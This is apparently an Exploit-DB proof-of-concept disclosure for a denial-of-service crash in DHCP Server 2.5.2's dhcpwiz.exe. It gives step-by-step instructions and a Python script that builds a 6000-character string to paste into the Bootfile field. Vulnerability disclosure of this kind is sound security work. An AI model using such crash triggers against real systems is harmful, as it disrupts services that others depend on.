"DHCP Server 2.5.2 - Denial of Service (PoC)"

Author: "Victor Mondragón"

Platform: windows

Release date: 2019-04-17

#Exploit Title: DHCP Server 2.5.2 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-04-16
#Vendor Homepage: http://www.dhcpserver.de/cms/
#Software Link: http://www.dhcpserver.de/cms/wp-content/plugins/download-attachments
#Tested Version: 2.5.2
#Tested on: Windows 7 x32 Service Pack 1

#Steps to produce the crash:
#1.- Run python code: DHCPSRV_2.5.2.py
#2.- Open dhcp.txt and copy content to clipboard
#3.- Open dhcpwiz.exe
#4.- Click Next
#5.- In Network Interface cards Select "Local Area Connection" and click on Next
#6.- In Supported Protocols click on Next
#7.- In Configuring DHCP for Interface Select "DHCP Options"
#8.- Select "Bootfile" field and Paste ClipBoard
#9.- Crashed

# Build a string of 6000 "A" characters and write it to dhcp.txt
cod = "\x41" * 6000
with open('dhcp.txt', 'w') as f:
    f.write(cod)